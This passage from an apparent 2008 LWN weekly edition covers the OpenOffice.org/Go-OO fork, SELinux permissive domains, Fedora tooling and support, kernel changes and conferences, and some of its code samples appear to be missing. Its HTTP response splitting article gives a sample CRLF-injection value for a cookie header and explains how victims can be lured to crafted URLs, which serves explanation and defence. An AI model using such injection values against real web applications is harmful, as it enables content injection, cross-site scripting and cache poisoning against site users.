innovation by folks who are not necessarily OOo "contributors"—as
they have 
not signed the Sun
Contributor Agreement (SCA) [ PDF, currently unavailable due to the download
traffic problems ].  Sun's community manager for OOo, Louis Suarez-Potts,  
puts
it this way:

OOo 3.0 adds to that freedom by using extensions much the same way that
Firefox does: it gives all users the freedom to add new features,
functionality. At present, we have a couple of hundred, and they have
proved popular. We've also done minimal advertising. I anticipate that in
the coming months, as 3.0 gains yet more popularity (all servers are down
at the moment), there will be more and more interesting extensions out
there. 

I can see extensions that radically depart from what we consider "office"
tools---and why not? OOo is an integrated set of tools based on fairly
conservative conceptions of office software. But there is no compelling
reason to stick with the conservative past, and every reason to be
creative.


One of the new features that OOo developers are most excited about won't
affect Linux users at all.  OOo 3.0 has a native Mac OS X look and feel, rather
than the earlier X11-based interface.  A native Windows version has always
been a part of OpenOffice (and its precursor, StarOffice), but the new
default theme is said to be particularly attractive on that platform.


There are various new features aimed at those currently using—or
needing to interoperate with—Microsoft Office.  There is support for
Access database files as well as improved Visual Basic for Applications
(VBA) macro support.  Somewhat controversially, OOo 3.0 has added the
ability to read (but not write) Office Open XML (OOXML) files.  OOXML is
the newly minted standard for office documents that Microsoft and Ecma pushed through the ISO
standardization process earlier this year.


Support for OOXML is one of the contentious areas surrounding OOo.  There
are two (vocal) developer camps, one Sun-centric, the other Novell-centric;
unsurprisingly they tend to clash over OOXML as well as development pace
and direction issues.  It has gotten to the point where a fork, called Go-OO, has come about, led by Novell's Michael
Meeks.  Go-OO's version of OOo has been adopted by several distributions
leading some to see it as a "hostile" fork.


Sun's chief open source officer, Simon Phipps, clearly sees
Go-OO (and the 
related OO-Build) as an attempt by Novell to control OOo:

The result of this is that go-oo.org is definitely a hostile and
competitive fork of OpenOffice.org, and OO-Build is no longer a helpful
downstream since it no longer upstreams much of anything (especially for
Mac), small changes excepted. Unlike Groklaw I'd still hesitate to call
OO-Build a fork, but Go-OO is unmistakably one, just look at the web site,
the Windows build and the rhetoric. 

The motivation for Go-OO being hosted and promoted by Novell and its staff
seems unmistakable to me, as does the fact it is a Novell-sponsored
fork. They are promoting Microsoft's flakey XSLT-based OOXML support, they
are isolating Linux from OpenOffice.org (so that no-one in the main
OpenOffice.org community is able to get support contracts from Linux
users). And it is all cleverly wrapped in a community-friendly story about
hackers and their freedom and evil, controlling Sun, delivered without
interference from Novell corporate.  


Meeks most recent look
at OOo development is the proximate cause of much of the current
sniping in various blogs.
Meeks analyzes commits to the OOo codebase to try to extract trends in the
development of the tool.  His conclusion is stark—undoubtedly
inflammatory to those in the Sun camp—"Crude as they
are - the statistics show a picture of slow disengagement by Sun, combined
with a spectacular lack of growth in the developer community." 


While there have been various responses to the analysis—including
this LWN comment
thread—there has, as yet, been no real counter-analysis that
comes to a different conclusion.  Perhaps there are other ways to slice and
dice the data that look more favorable to growth in the OOo community, but
if not, the conclusion is worrisome.  OOo is a very useful tool, that is
used by many, which offers a way out of Microsoft lock-in.  Because of
Novell's close association with Microsoft, people worry that Go-oo is an
underhanded means for another kind of lock-in—this time to Novell.


In what seems almost a taunt—as well as a validation of the
accusation of a hostile fork—Meeks adds a postscript to his analysis:

Why is my bug not fixed ? why is the UI still so unpleasant ? why is
performance still poor ? why does it consume more memory than necessary ?
why is it getting slower to start ? why ? why ? - the answer lies with
developers: Will you help us make OpenOffice.org better ? if so, probably
the best place to get started is by playing with go-oo.org and getting in
touch [...]


There have long been complaints about the pace of OOo development, along
with calls
for creating a foundation to oversee it.  It would seem that OOo is at
a bit of a crossroads.  If Sun's commitment is reduced, without a
corresponding increase in contributions from others, OOo could
stagnate—or Go-oo could take over.


Ostensibly, the SCA is one of the sticking points for some contributors.
They do not trust Sun not to take their contributions in a proprietary
direction.  But the conflict is really rooted in issues of control and
development 
direction—two things likely to lead to forking.  While two forks is
suboptimal, perhaps, it may lead to improvements in both the code
and the development process for OOo.


There are legitimate concerns on both sides of the issue—undoubtedly
the mostly silent user community has yet another perspective—but
there is enough bad blood between them that it is hard to see it resolving
in some relatively amicable way.  The office application suite is an
extremely lucrative product, at least in the proprietary world.  One gets
the sense that both Sun and Novell are seeing dollar signs which are clouding
their vision.  A neutral foundation of some kind might be a good first step
towards reconciliation.


		SELinux permissive domains


Readers of this page—along with the kernel page—will not find
it surprising that SELinux is a complex beast.  It is, however, the
dominant security framework for Linux, pushed hard by Red Hat, but also
being adopted, slowly, by SUSE, Ubuntu, and others.  Over the years,
through lots of 
hard work, it has become somewhat less complex, at least for
administrators; a new feature, called permissive domains will help
further ease the administration of SELinux-enabled systems.


These days, SELinux has two modes, the aptly named enforcing and
permissive modes.  When in enforcing mode, SELinux will not allow
operations that are not permitted by the policy, whereas in permissive
mode, a violation is just logged and the operation is allowed to continue.
Administrators trying to track down an SELinux problem with an
application—whether a real security issue or just a problem with the
policy—can put the system into permissive mode, then study the logs
to determine what policies are being violated.  Or they can use audit2allow
to make those policy changes for them.


Until permissive domains, though, the choice between permissive and
enforcing was binary for the entire system.  By putting a system into
permissive mode, various attacks that SELinux might normally stop on other
applications would instead just be logged.  With permissive domains, a
single process, or group of related processes, can be marked as permissive,
while the rest of the system stays in enforcing mode.


Red Hat SELinux hacker Dan Walsh, describes permissive
domains on his blog.  One of the motivations is to help third-party
software developers feel more comfortable about shipping SELinux policy
with their application:

Another problem SELinux has is that third party software companies want to
ship with SELinux policy for their software but do not trust that they have
tested it well enough to run their confined applications in enforcing mode.
I have talked to developers of stock market software that wanted to write
policy for an application, distribute it to a live environment of several
hundred machines, and then gather the AVCs as they happen, using this
information to fine-tune their policy.  After a long period of time, where
they saw no AVCs, they might be willing to put their policy in enforcing
mode.  In RHEL5 they need to put the entire machine in permissive mode, but
permissive domains solve this problem. 


Permissive domains are available in recently updated Fedora 9 systems and
will come standard with Fedora 10.  As Walsh shows, enabling permissive
mode for a domain is trivial:

which would put all CGI scripts into permissive mode.  And:

to remove permissive mode for the CGI script domain
(httpd_sys_script_t). 


This is definitely a nice step forward for assisting with policy
development, but there is still a lingering problem with the recommended
way to generate SELinux policies.  Walsh describes how that is done:

Finally, when someone wants to write policy for a new confined domain,  we
tell the policy writer to build a minimal policy using tools like
system-config-selinux.  Then we advise them to put the machine in
permissive mode, run the confined application, collect the AVC messages,
use audit2allow to generate new policy, and try again.  Lather, rinse,
repeat.  This puts the entire machine at risk, since it is no longer
protected by SELinux.  With permissive domains, you can mark the new domain
as permissive and avoid putting the machine at risk.


The problem, of course, is that blindly using audit2allow is
extremely dangerous.  It assumes that the application has no security
problems, that all of its accesses should be permitted—if that can be
assumed, what is SELinux for?  By taking all 
of the violations and turning them into policy changes, the application,
rather than the policy developer, decides on the access it requires.  Using
audit2allow correctly is much more complex, requiring a good
understanding of SELinux and the existing policies and domains.


To be fair to Walsh, in a related post, he does warn:

Whenever you generate policy in this way you should really examine the te
file for what rules audit2allow has generated and try [to] make sure they make
sense, and don't open a security [hole].  It is always good to ask if the
policy is good on a list like fedora-selinux.  If you believe this is a bug
in policy, please open a bugzilla.  Then we can fix the policy for others.


The audit2allow manpage is even more explicit:

Care must be exercised while acting on the output of  this  utility  to
ensure  that  the  operations  being  permitted  do not pose a security
threat. Often it is better to define new domains and/or types, or  make
other structural changes to narrowly allow an optimal set of operations
to succeed, as opposed to  blindly  implementing  the  sometimes  broad
changes  recommended  by this utility.   Certain permission denials are
not fatal to the application, in which case it  may  be  preferable  to
simply  suppress  logging  of  the denial via a dontaudit rule rather
than an allow rule.


Using audit2allow is, unfortunately, the way that most SELinux
policy is developed.  There aren't enough SELinux experts—there may
never be enough—to actually look at the code for applications and
determine a priori what the policy should look like.  So, testing
applications by running them to determine what permissions they require is
the only sane way to do it, error-prone though it may be. 


		What is Ulteo?


Gaël Duval, founder of Mandrake-Linux, started Ulteo after he was laid off by Mandriva in 2006.  The first alpha
release was announced several months later.

In the past two years the project has had some time to mature and with the
announcement that OpenOffice.org 3.0 is
available through Ulteo.com it seemed like a good time to revisit the
project.

Ulteo is aimed at Windows users, and gives them a slow and easy to way to
convert to Linux using the first of several several sub-projects; the Ulteo Online
Desktop.  Many Linux applications are available through a Java enabled
web browser such as Firefox or Internet Explorer.  OpenOffice.org, KPdf,
Kopete, Skype, Thunderbird + Enigmail, Gimp and Digikam, Inkscape and
Scribus and many other applications are available in the Online Desktop
without installing any new software on the PC.  A subscription to Ulteo
Premium provides extra storage for documents and other benefits.

Once the user becomes comfortable with Linux applications they could be
ready for the Ulteo
Application System which is an installable system for the PC.  The
Application System features automatic document synchronization/backup,
automatic updates and upgrades, and all the applications included in the
online desktop.

The Ulteo
Virtual Desktop seems to be much the same as the Online Desktop.  It is
designed to run under Windows and allows the use of both Linux and Windows
applications.  The Virtual Desktop uses coLinux to provide the Linux
desktop on Windows.

The final Ulteo product, for now at least, is the Documents
Synchronizer.  This, like the Virtual Desktop, is Windows software but
it can be used with the Online Desktop to backup and retrieve documents,
whether these are produced locally with Windows applications or with Linux
applications using Online Desktop.

Ulteo is not something that will be of immediate interest to the average
LWN reader.  Presumably most readers are already knowledgeable about
running Linux and its applications.  However most of us probably do know
someone who is not ready to run Linux natively.  At least some of those
people could start using the Online Desktop and become more familiar with
various Linux applications without having to download and install those
applications.  Who knows where they might go after that.

		Fedora checking community health with EKG


Measuring the health of communities is an interesting, difficult task.  The
Fedora project has recently started using a new tool, called EKG, to try to get an overview of
the demographics of the free software projects that are sponsored by
the distribution.  EKG is still young, but already provides some
interesting information.  Because it is GPL-licensed, as is the Fedora
norm, it can be picked up by other distributions or interested parties to
target their own projects.


At its core, EKG is a few Ruby scripts that process mailing list data so
that graphs can be produced.  Currently, it produces both pie charts and
line graphs that indicate the number of Red Hat posters versus those from
elsewhere.  A portion of the most
recent set of graphs can be seen at right.


Red Hat's Michael DeHaan has taken on development of EKG to use as a tool
to measure how 
well various projects are building a community separate from Red
Hat.  There are lots of free software projects that have been released by
Red Hat—or Fedora, which often amounts to the same thing—but
may or may not be seen as useful tools outside of Fedora.  By looking at
the mailing list traffic, particularly over time, some idea of which
projects are building a community, and which aren't, can be derived.  As
the project page puts it:

The premise is simple... what are the demographics behind open source
projects that we run in Fedora? 


Who posts
Who contributes
What projects are most active?
What projects need a little help?


Mailing lists are just one measure of the health of a project, of course,
so DeHaan is looking at other metrics.  Commits to the project
repository—along with the identities of the commiter—would seem
an obvious choice.  Better graphs with more useful information on each axis
as well as time series of the pie charts are also on the "to do" list.
He is also looking at derived statistics that will allow direct comparison
of different projects by using equations that in some way model success.


It is difficult to draw any conclusions from the limited graphs that are
currently available.  One thing that does stand out, though, is the
popularity of gmail.com email addresses, which seem to account
for around one-quarter of posts.  One can also certainly see projects that
are completely dominated by "inside" (i.e. Red Hat) folks.  The JBoss lists
are a good example.


Projects are trying various ways to measure how well they are doing their
job; EKG is another way to do that.  For the kernel, the statistics on each 
release are gathered by LWN, as well as over longer
periods by the Linux Foundation.  Ubuntu has its Upstream Report which looks at
how well bugs are getting to upstream bug trackers.  Undoubtedly other
projects have their own ways of trying to measure their impact.


As yet, there is no mailing list for EKG development.  We look forward to
the day when EKG is applied to its own development list.  It would seem
that some kind of "metahealth" measurement of the community
might be able to be derived from that data.


		Block layer: solid-state storage, timeouts, affinity, and more


The 2.6.28 merge window has seen the addition of a number of changes to the
block layer.  Here's a summary of the new features and APIs which have gone
in.

Solid-state storage devices

There are some enhancements aimed at improving the kernel's support
of solid state storage devices.   One of those, the discard API, has been
covered here before.  This API allows
high-level block subsystem 
users (filesystems) to indicate that a particular range of blocks no longer
contains useful data.  That allows the low-level device to incorporate
those blocks into its garbage collection scheme and to stop worrying about
their contents when performing wear leveling.


Since the initial LWN article, though, the API has changed a little.  The
way to issue a discard request is now:


The end_io() parameter seen in previous versions of the API is no
longer present.  There is no way for callers to know when the request
completes, or, indeed, if the request completes at all.  Since the caller
is indicating a lack of interest in the given sectors, it really should not
matter what the device does thereafter.

There is a filesystem-level function for creating discard requests:


Here, the interface is expecting block numbers using the filesystem block
size, rather than 512-byte sectors.

User-space programs can issue discard requests with the new
BLKDISCARD ioctl() call.  Needless to say, such
operations should be done with care; about the only logical user of this
ioctl() would be mkfs programs.


Block drivers which support discard requests will provide a suitable
function to the block layer:


In the absence of a "prepare discard" function, discard requests for the
device will fail.


The block layer has also added a flag by which drivers can indicate that a
device is not rotating storage, and, thus, does not suffer from seek
delays.  By setting QUEUE_FLAG_NONROT (with
queue_flag_set() or queue_flag_set_unlocked()), a driver
tells the block layer that it is working with a solid state device.  I/O
schedulers can use that information to avoid plugging the queue - a useful
technique for combining requests to rotating storage devices, but a useless
operation when there is no seek penalty to avoid.

Request affinity

On large, multiprocessor systems, there can be a performance benefit to
ensuring that all processing of a block I/O request happens on the same
CPU.  In particular, data associated with a given request is most likely to
be found in the cache of the CPU which originated that request, so it makes
sense to perform the request postprocessing on that same CPU.  With 2.6.28,
sysfs entries for block devices will include an rq_affinity variable.
If it is set to a non-zero value, CPU affinity will be turned on for that
device.  According to the patch changelog, turning this feature on can
reduce system time by 20-40% on some benchmarks.


Timeout handling

Robust device drivers typically have to be written to handle cases where
devices fail to complete operations they have been instructed to do.  In a
few cases, higher-level code helps with this task; the networking layer,
for example, can track outgoing packets and let a driver know when a
transmit operation has taken too long.  In most other drivers, though, it's
up to the driver itself to notice when an operation seems to be taking too
long.

Like the network subsystem, the block layer manages queues of requested
operations.  As of 2.6.28 the block layer will, again like networking, have
a mechanism for notifying drivers about request timeouts; that, in turn,
will allow a bunch of timeout-related code to be removed from the lower
layers.  Timeout handling in the block layer can be more complex, though,
and the associated API reflects that complexity.

A block driver must register a function to handle timed-out requests:


The amount of time a request should be outstanding before timing out is set
up with:


The tracking of per-request timeouts is done within the block layer; the
timer for any individual request is started when that request is dispatched
to the driver by the I/O scheduler.  Should a request fail to complete
before the timeout period passes, the driver's timeout function will be
called with a pointer to the languishing request.  The driver then can do
one of three things:


 Figure out that, in fact, the request was completed as expected, but 
     that completion had not been noticed by the driver.  A dropped
     interrupt could bring out such a situation, for example.  In this
     case, the driver returns BLK_EH_HANDLED, and the request will
     be marked as completed.

 Decide that the request needs more time, perhaps because it has been
     re-issued by the driver.  A BLK_EH_RESET_TIMER will start the
     timer again for this request.

 Punt and return BLK_EH_NOT_HANDLED.  The block layer
     currently does nothing at all when it gets this return code; future plans
     appear to include aborting the request within the block layer when
     this return value is encountered.


If things look bad, the driver may decide to abort any outstanding
requests, reset the device, and start over.  There are a couple of new
functions which can help with this task:


These functions will abort the given request, or all requests on the queue,
as appropriate.  Part of that process involves calling the driver's timeout
handler for each aborted request.

Other changes in brief

Some other block-layer changes include:


 The handling of minor numbers has been changed, allowing disks
     to have an essentially unbounded number of partitions.  The cost of
     this change is that minor numbers may be attached to a different major
     number, and they might not all be contiguous; for this reason, drivers
     must set the GENHD_FL_EXT_DEVT flag before the extended
     numbers will be used.  See this
     article for more information on this change.

 The prototypes of blk_rq_map_user() and
     blk_rq_map_user_iov() have changed; there is now a
     gfp_mask parameter.  This allows these functions to be used
     in atomic context.

 kblockd_schedule_work() has an additional parameter
     specifying the relevant request queue.

 The new function bio_kmalloc() behaves much like
     bio_alloc(), but it does not use a mempool to guarantee
     allocations and can thus fail.


It is, all told, one of the busier development cycles for the block layer
in recent times.

		Fedora and long term support


The news
that Wikipedia was in the process of switching away from Red Hat and
Fedora—and to Ubuntu—has stirred up some Fedora
folks.  The relatively short, 13 month support cycle for Fedora releases
was fingered as a major part of the problem in a gigantic thread
on the fedora-devel mailing list.  Some would like to see Fedora be
supported for longer, so that it could be used in production environments,
but that is a fundamental misunderstanding of what Fedora has set out to
do.  


The idea of supporting Fedora beyond the standard "two releases plus one
month", which should generally yield 13 months, is not new. It was, after
all, the 
idea behind the Fedora Legacy
project.  Unfortunately, Fedora Legacy ceased operations at the end of
2006, 
largely due to a lack of interested package maintainers.  So, calls for a
"long term support" (LTS) version of Fedora are met with a fair amount of
skepticism. 


Just such a call went up in response to the Wikipedia news.  Patrice Dumas
outlined the need:

[...] it seems to me that a true Fedora LTS is
missing, that would allow those who want things that are new, including 
for testing but cannot afford changing everything each year (servers for 
example or user desktops). It seems to me that fedora ends up being used
almost exclusively as single user desktop, so that testing of other
functionalities is likely to be less widespread.


Fedora is not meant for production use, nor for those who cannot upgrade at
least yearly.  It has an entirely different mission, which
Jon Stanley sums up:

Well, in all fairness, Fedora's stated goal is to advance the state of
free software. You get that by being bleeding-edge. Unfortunately,
being bleeding edge also means not being suitable for production
environments - these are two fundamentally incompatible goals. This is
why Red Hat Linux split into two - Fedora and RHEL. RHEL is a
derivative distribution of Fedora.


Many believe that folks who want "Fedora LTS" would be better served by Red
Hat Enterprise 
Linux (RHEL) or, for those that do not want to pay for a distribution with
support, an RHEL 
derivative such as CentOS or Scientific Linux.  But those don't have the
package diversity available with Fedora.  A stable release would also want
to freeze major packages at a particular version—only backporting
security fixes into that version—which is definitely not what is done
with Fedora while it is being supported.  Dumas wants to see something that
finds a middle ground:

Fedora legacy (or fedora lts) would not be the same than centos. Maybe a
Centos + repository with more recent stuff would be, but currently I
think that there is something in the middle between fedora and centos
that is missing.


The Extra Packages for
Enterprise Linux (EPEL) project is meant to help fill that gap, by
maintaining additional packages—beyond what Red Hat
maintains—for RHEL and compatible distributions.  Typically, though,
those packages will also be held at a version level that will, with time,
grow rather obsolete, at least to those who want to more closely follow the
upstream project.  And, of course, there aren't as many packages available
for the enterprise distributions, even with EPEL, as there are for Fedora.


It would seem the classic tension between "bleeding edge" and stable as
described by Stanley.  Though it isn't clear how it would solve that
problem, there are calls for reviving Fedora Legacy.  There are few opposed
to the idea of continuing Fedora support—if enough people can be
found to do it—but the implementation details seem to bog things down.
There is a bit of a "chicken and egg" problem in that attracting package
maintainers is hard to do without a project to point to, but convincing the
Fedora Engineering Steering Committee (FESCo) that it is worthwhile without
having those maintainers will be difficult.


One of the sticking points is the availability of
infrastructure—servers and bandwidth primarily—for any nascent
legacy project to use.  The Fedora board is seen as being resistant to
allowing the use of the Fedora infrastructure for such a project.  In
response to someone who pointed out that the board's approval is not
required, Dumas disagrees:

When it requires cooperation with the infrastructure, it does. It is
also possible to start something external like rpmfusion, but the amount
of work is very big. My proposal only made sense if the economies of
scale realized by working inside the fedora project were realized.

Still, if somebody provides the infrastructure, sure I'll try to help
with a project similar than the one I proposed, but I cannot myself do
anything for the infrastructure part.


There is also the question of what kind of guarantees a legacy project
would make about how long it would support older releases.  Dumas and
others seem to be in favor of essentially no commitment, maintainers would
continue supporting their packages for as long as they wished.  While
there is some attraction to that idea—it certainly reduces the number
of maintainers required—it is unclear that it actually provides a
useful service.  The idea that some security fixes are better than none is
attractive, but David Woodhouse cautions against that view:

If we present the _appearance_ of a distro with security updates, while
in fact there are serious security issues being unfixed, then that is
_much_ worse than the current "That distro is EOL. Upgrade before you
get hacked" messaging.

For anything to have the Fedora name on it, it _must_ have guaranteed
security fixes for at least the highest priority issues.


As the original Fedora Legacy project wound down, 
it left just this kind of impression by promising support,
but often not delivering it.  For several years, updates
for serious security problems were delivered late, if at all.  Any new
effort in that 
direction would have to be very clear about what it was delivering
and how it planned to get the job done.
A project that offered few, if any, guarantees would not be seen as
something very useful, but making guarantees that don't get met is far
worse. 


While there are clearly Fedora users that would be interested in hanging on
to their operating system for longer than one year, it isn't clear that there
are enough of them—and, more importantly, enough maintainers—to
make a legacy project successful.  Agreement on the goal of the project,
along with the promises it would make to adopters is important.  It is
difficult to see how the Fedora powers-that-be could allocate resources to
such a project without those things.  As Shmuel Siegel points out:

You are looking for 
infrastructure support from Fedora without indicating that there is a 
benefit to Fedora. Supply without demand is no more useful than demand 
without supply. Since Fedora views itself as "the cutting edge distro", 
you have an uphill PR fight. Give the Fedora project a reason to spend 
some of their limited resources on you. At least let them know your 
target audience and why they would be interested.


At least at this point, it doesn't seem like a revival of Fedora Legacy is
in the cards, which leaves the problem unaddressed.  Perhaps adding enough
additional packages to EPEL will allow CentOS to truly become "Fedora
LTS".  It should be noted that while the original concern that LTS users
might be switching to Ubuntu could well be true, Ubuntu LTS doesn't have a
solution to the problem of package versions slowly getting obsolete either.
Newer packages and 
stability are fundamentally at odds—trying to solve that problem is
probably far too large of a job for any community distribution.


		HTTP response splitting


HTTP response splitting (HRS) is a technique that attackers can use to
inject their own content into a web page.  It exploits the way that HTTP
delimits the boundary between its headers and the page content.  It also is
an example of that classic web application security bugaboo: improper
filtering of user input. 


The basic idea is that by injecting one or more carriage-return line-feed
(CRLF) sequences into the output that a vulnerable web application returns, an
attacker can control what goes to the victim's web browser.  The HTTP
response from a web server contains two parts: the headers that describe
the content and the body which contains the HTML for the page.
Each header is delimited by one CRLF and the header section is set off from
the body by two CRLFs.  It looks something like:

Where the first section is the headers, followed by the start of the HTML
content. 


The headers above are generated by the LWN web server directly, but
sometimes headers can contain information that comes from a user's
request, often in the form of cookies or redirections.  If an attacker can
sneak an extra CRLF or two into a header he controls, he can effectively
create new header lines, or inject his own body content.


Typically this is done by using the URL-encoding values for CR and LF:
%0d and %0a.  If the web application is not careful to
check for and filter those characters, the HTTP response can be split.  If,
for example, the value of the name variable is set into a cookie
using code like:

then a name like
"jake%0d%0a%0d%0a&lt;html&gt;surprise!&lt;/html&gt;" could 
lead to some rather unexpected results.  Obviously this is relatively
benign, and only impacts someone who sets their name that way, but
it does start to give an idea of the power of HRS. Incidentally, the code
above is not random, it is adapted from that used to demonstrate a recent Mono HRS
vulnerability.


If one can only inject headers into one's own session, it hardly merits
mention, but there are ways for an attacker to inject into a victim's
browser stream.  Perhaps the simplest is just by passing a parameter in the
URL in time-honored fashion:
http://some.vulnerable.site/app?name="...".  If the attacker can
get the victim to follow that link, they can control headers and body of
what gets returned by the server.  Depending on the application, persistent
versions, where a redirection URL, for example, was stored in a database,
might be another way for an attacker to exploit HRS.

HRS is not new, Amit Klein first described
it [PDF] in 2004, but it does keep cropping up.  As described in
Klein's paper, it can be used for cross-site scripting (XSS), web cache
poisoning, web site hijacking, and other nefarious activities.  More
recently, Jeremiah Grossman found
HRS vulnerabilities to be surprisingly widespread.  He was also
surprised at the variety and nastiness of the effects of HRS vulnerabilities.


HRS is not as well known as some of the other web application flaws, but it
is a serious problem that needs to be considered when building or auditing
such applications.  Hopefully, we are starting to see some decline in the
number of SQL injection, XSS, and other higher profile vulnerabilities,
which may mean that attackers start looking towards the more obscure for
exploitation.  In what is likely to be a never-ending battle for control of
our web applications, getting out ahead of the attacker community can only
be a good thing.


		2.6.28 merge window, part 2


As of this writing, just under 6200 non-merge changesets have been merged
into the mainline kernel since the 2.6.27 release.  This merge window
should be drawing to a close around October 24, so we are getting
closer to seeing what 2.6.28 will look like.  User-visible changes merged
since last week's update
include:


 New drivers have been merged for
     Maxim/Dallas DS3234 SPI realtime clock chips,
     VIA UniChrome Family graphics chipsets,
     Toshiba Mobile IO framebuffers,
     C-Media CM109 USB phones,
     the touchpad shipped on OLPC XO systems,
     Automata Sercos III PCI cards (via UIO),
     Delcom USB 7-segment LED displays,
     generic USB test-and-measurement devices,
     Freescale QE/CPM USB device controllers,
     Vernier Software Technologies USB spectrometers,
     GPIO-connected NAND flash devices,
     Freescale i.MX2 and i.MX3 flash controllers,
     OMAP2/OMAP3-connected OneNAND flash devices,
     Dialog DA9030/DA9034 multifunction controllers, and
     Texas Instruments TWL4030/TPS659x0 multifunction controllers.


 The driver staging tree has been moved into the mainline.
     It brings with it a new TAINT_CRAP flag and suitably tainted drivers
     for Meilhaus ME-4000 data collection boards,
     Go 7007 ("some weird device") video controllers,
     Agere ET-1310 Gigabit Ethernet controllers,
     Atmel at76c503/at76c505/at76c505a wireless USB cards,
     Alacritech SLIC Technology non-accelerated 10Gb Ethernet cards,
     Alacritech IS-NIC gigabit Ethernet cards,
     Winbond w35und wireless network adapters,
     and Prism 2.5 USB wireless network adapters (a driver which includes
     its own 802.11 stack).  Also added are an echo cancellation module and
     a driver which enables the passing of network packets over a USB link.


 A lot of work on the Intel i915 graphics driver has been merged; this
     work includes the Graphics
     Execution Manager (GEM) GPU memory management subsystem and "IGD
     OpRegion" support which enables ACPI backlight control.  It looks like
     kernel-based mode setting might not make it for 2.6.28, but much of
     the rest of the big graphics rework is now merged.

 The way video drivers handle waiting for vertical blank cycles has
     been changed to reduce interrupts - and, thus, power consumption.

 Rik van Riel's memory
     management scalability patches have, at long last, been merged.
     These patches separate the management of anonymous, file-backed, and
     completely unevictable pages, eliminating a lot of useless page scanning.

 Another VM improvement causes the system to free a page's swap space 
     after that page is brought back into RAM; this effectively increases
     the amount of swap available on the system.

 Nick Piggin's rewritten vmap
     layer should give significant performance  
     improvements, especially as the number of CPUs on a system grows.

 Huge pages will now be included in core dumps, making the debugging of 
     applications using those pages easier.

 The container freezer
     has been merged.  It is now possible for the system to freeze all
     processes within a container (control group) as a unit.


 The KVM virtualization code has seen a number of improvements,
     including the ability to assign PCI devices to guests and support for
     Intel "Tukwila" processors.

 Kprobes are now supported by the SuperH architecture.

 There is a new ext3 mount option (data_err=abort) which
     causes filesystem operations to abort when I/O errors are
     encountered.  In the absence of this option, the old behavior
     (continue but complain in the system log) remains.

 In-kernel interrupt balancing for 32-bit x86 systems has been
     removed.  This feature has been deprecated (in favor of user-space
     balancing) for some time.


Changes visible to kernel developers include:


 A number of tracing-related patches have been merged.  These include
     the tracepoints
     mechanism, some instrumentation in the core scheduler code, 
     improvements to the ftrace function tracing feature,
     a new ftrace-based stack tracer,
     a new ftrace-based boot (initcall) tracer, and
     the low-level trace
     buffer code.

 The sysctl strategy() function prototype has changed: the
     unused name and nlen parameters have been removed.

 Asynchronous I/O support can now be configured out of the kernel,
     saving about 7KB of space on systems where AIO is not needed.

 As planned, device_create_drvdata() has been renamed to
     device_create(), with the same parameters.

 There is now a mechanism to enable and disable output from
     pr_debug() and dev_dbg() calls on a per-module
     basis.  Control is through a virtual file in debugfs.  There is no
     documentation file associated with this change; instructions on how
     to use this feature can be found in the
     patch changelog.

 The new dev_WARN() function:


     will output the formatted warning, along with a full stack trace.
     This will allow the warnings to be collected at kerneloops.org and incorporated into
     the reports there.

 The new %pR formatting directive allows printk() and
     friends to output the contents of resource structures.

 There is a new function intended to make life easier for PCI driver
     writers:


     This function will remap the entire PCI I/O memory region, as
     selected by the bar argument.


See next week's Kernel Page for a summary of the final days of the 2.6.28
merge window.

		A tale of two conferences


Like many communities, the Linux community depends heavily on conferences
as a way to help our developers and users know each other and work well
together.  We make highly effective use of electronic communications, but
there is truly no substitute for occasionally getting together, sharing a
beer or three, and engaging in some high-bandwidth discussion.  So it
stands to reason we want our events to be as productive and useful as
possible, especially given the expense of participating in them.


Your editor recently had the fortune of attending, over the course of one
week, two conferences which are arguably the oldest and the newest in our
community.  They were both interesting events, but they were very different
in their organization and attendance.  Both show both strengths and
weaknesses in our organization of face-to-face events.  


Arguably, the first Linux-related event ever was Linux-Kongress 1994.
That gathering brought together developers working
on the Linux kernel for the first time; it played host to a large portion
of the (quite small) development community.  For a period of time thereafter,
Linux-Kongress was the development event for 
people working at or near the kernel level.  It didn't take too long for
other conferences (notably Linux Expo in the US) to grab some of the
spotlight, but, unlike Linux Expo, Linux-Kongress is still an active
conference.  

The 2008 event, in Hamburg, Germany, was well organized and a
lot of fun; it was a pleasant gathering of a part of the community which
your editor visits far too rarely.  It was a technical conference for
technical people, with a number of well-known developers present.  
But it must be said: Linux-Kongress is a small and relatively obscure event
in 2008.  There were maybe 200 attendees; much of the northern European
development community was absent.  Even some developers based in Hamburg
declined to attend.  The quality of the talks was not uniformly good,
though some were excellent.  And, in stark contrast to the recent Linux
Plumbers Conference, it's hard to point at much work that got done.
For something that was once the Linux
development gathering, Linux-Kongress has clearly come down in the world.


It is interesting to observe that Europe, while being the home to large
numbers of free software developers, lacks a definitive development
conference.  That is not to say that no interesting events happen there;
GUADEC and Akademy are probably the biggest desktop conferences, and the
upcoming combined
event is something to look forward to.  But
developers looking for a pan-European, Linux-oriented conference will not find
one.  LinuxConf.eu, a combination of the UKUUG and Linux-Kongress events
held in Cambridge last year, offered the potential to become such an event,
but the LinuxConf.eu idea appears to have stalled for now.


From Hamburg, your editor flew straight to New York City, where the
Linux Foundation's
End-User Summit was held.  This event, happening
for the first time, differs greatly from Linux-Kongress in many ways.  To
begin with, it was an invitation-only event, and one which explicitly
excluded the press (which is why there have been no LWN articles from
there).  It was also intended to host a mixture of developers and users,
and to allow them to talk to each other.  These characteristics led to a
different sort of conference experience.


[PULL QUOTE: 
We do not run an invitation-only community; excluding
people from our conferences seems to run counter to the inclusive
atmosphere we normally try to encourage.
 END QUOTE]


The invitation-only nature of some Linux Foundation events naturally leads
to complaints.  We do not run an invitation-only community; excluding
people from our conferences seems to run counter to the inclusive
atmosphere we normally try to encourage.  The Linux Foundation's reasoning
here is easy to understand, though: many of the targeted end users (who represent
mainly the financial industry in New York) have a hard time talking about
what they are doing in any setting.  In an open conference with press in
attendance, those people will simply keep their mouths closed - if they
show up at all.


The user community represented by the financial industry is important; they
are a significant part of the business which keeps the enterprise
distributions going.  Even now, they are highly sought after as customers.
It is important to know what they are thinking and what their biggest
difficulties with Linux are.  In the absence of an event like the End User
Summit, this information will only be communicated directly to the enterprise
distributors under a non-disclosure agreement.  An invitation-only summit
is fundamentally exclusive at one level, but it does help the development
community (as opposed to one or two companies) get a sense for what this
user community is thinking.


So what are they thinking?  They feel some stress between the stability of
enterprise distributions and the desire to have the features developed by
the community in recent years.  They want good tracing mechanisms, but do
not necessarily need the dynamic tracing provided by tools like
DTrace or SystemTap.  They like Linux because its broad hardware support
frees them from reliance on any specific hardware vendor.  They are very
interested in work on next-generation filesystems.  Some of them, at
least, very much want to better understand how our development process
works and, possibly, participate in it.  See the Linux Foundation's press
release for a summary of what was discussed there.


It was a productive gathering, especially once the CEOs got off the stage
